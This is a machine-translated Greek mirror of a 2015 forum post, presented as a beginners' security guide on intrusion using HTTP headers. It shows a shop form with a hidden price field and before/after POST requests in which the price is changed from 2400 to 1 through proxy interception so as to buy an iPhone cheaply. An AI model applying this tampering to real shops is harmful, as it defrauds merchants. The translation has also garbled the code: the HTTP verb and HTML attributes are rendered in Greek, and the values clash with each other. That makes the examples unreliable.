Αυτό το άρθρο είναι ένα άρθρο καθρέφτη της αυτόματης μετάφρασης, κάντε κλικ εδώ για να μεταβείτε στο αρχικό άρθρο.

Architect_Programmer_Code Δίκτυο Γεωργίας»Αρχιτέκτονας Άλλες τεχνολογίες Ασφαλής επίθεση και άμυνα Διείσδυση εισβολής: Εφαρμογή κεφαλίδων HTTP
Άποψη: 12586|Απάντηση: 0

[Οδηγός ασφαλείας] Διείσδυση εισβολής: Εφαρμογή κεφαλίδων HTTP

[Αντιγραφή συνδέσμου]
Δημοσιεύτηκε στις 7/2/2015 5:59:07 μ.μ. | | |

Σχετικά με την εφαρμογή των κεφαλίδων HTTP

Η κεφαλίδα http χρησιμοποιείται συνήθως στον μηχανισμό μετάδοσης ιστότοπων, αλλά οι περισσότεροι αρχάριοι στην Κίνα δεν έχουν παρατηρήσει αυτό το κομμάτι, αυτό το άρθρο είναι αφιερωμένο μόνο σε αρχάριους, ο ρόλος της κεφαλίδας http στη διαδικασία εισβολής.

Πάρτε τη σελίδα αγορών ως παράδειγμα για να αναλύσετε ένα μικρό μέρος του ρόλου των κεφαλίδων HTTP.

Αρχικά, ας αναλύσουμε μια φόρμα στη σελίδα αγορών.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="κρυφό" name="τιμή" value="449">

<input type="submit" value="Αγορά">

</form>

Κατά τη διαδικασία ανοίγματος, τραβήξτε ένα στιγμιότυπο οθόνης της κεφαλίδας του μηνύματος http και ρίξτε μια ματιά

ΔΗΜΟΣΊΕΥΣΗ /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

Ποσότητα=1&τιμή=2400

Παρόλο που το πεδίο τιμής δεν εμφανίζεται στη σελίδα κατά το άνοιγμα της σελίδας αγορών, εξακολουθεί να μπορεί να επεξεργαστεί και να λειτουργήσει από τον χρήστη.

Υπάρχουν δύο τρόποι για να επιτευχθεί η επεξεργασία

1. Αποθηκεύστε τον πηγαίο κώδικα HTML για τροποποίηση και, στη συνέχεια, φορτώστε τον ξανά στο πρόγραμμα περιήγησης για εκτέλεση

2. Χρησιμοποιήστε την υποκλοπή διακομιστή μεσολάβησης για να τροποποιήσετε τις κεφαλίδες HTTP (κατασκευή διακομιστή μεσολάβησης στο ρέψιμο εργαλείων)

Πάρτε για παράδειγμα την παραπάνω κεφαλίδα HTTP
Πριν από την αλλαγή
ΔΗΜΟΣΊΕΥΣΗ /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

Ποσότητα=1&τιμή=2400

Μετά την αλλαγή
ΔΗΜΟΣΊΕΥΣΗ /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

Ποσότητα=1&τιμή=1


Στην τελευταία γραμμή το πεδίο Τιμή έχει τιμή 2400 και αν το αλλάξουμε σε 1 μπορούμε να πάρουμε το iPhone 4S σε φθηνότερη τιμή.

Αυτό το άρθρο παρέχει μόνο μια ιδέα για απροσδόκητα κέρδη, όπως η ένεση LDAP.




Προηγούμενος:Η MySQL ξέχασε τη μέθοδο υλοποίησης κωδικού πρόσβασης ανάκτησης κωδικού πρόσβασης
Επόμενος:SQL injection για να αποκτήσετε την πλήρη διαδρομή του ιστότοπου

σχετικές αναρτήσεις
Αποκήρυξη:
Όλο το λογισμικό, το υλικό προγραμματισμού ή τα άρθρα που δημοσιεύονται από το Code Farmer Network προορίζονται μόνο για μαθησιακούς και ερευνητικούς σκοπούς. Το παραπάνω περιεχόμενο δεν θα χρησιμοποιηθεί για εμπορικούς ή παράνομους σκοπούς, άλλως οι χρήστες θα υποστούν όλες τις συνέπειες. Οι πληροφορίες σε αυτόν τον ιστότοπο προέρχονται από το Διαδίκτυο και οι διαφορές πνευματικών δικαιωμάτων δεν έχουν καμία σχέση με αυτόν τον ιστότοπο. Πρέπει να διαγράψετε εντελώς το παραπάνω περιεχόμενο από τον υπολογιστή σας εντός 24 ωρών από τη λήψη. Εάν σας αρέσει το πρόγραμμα, υποστηρίξτε γνήσιο λογισμικό, αγοράστε εγγραφή και λάβετε καλύτερες γνήσιες υπηρεσίες. Εάν υπάρχει οποιαδήποτε παραβίαση, επικοινωνήστε μαζί μας μέσω email.
Mail To:help@itsvse.com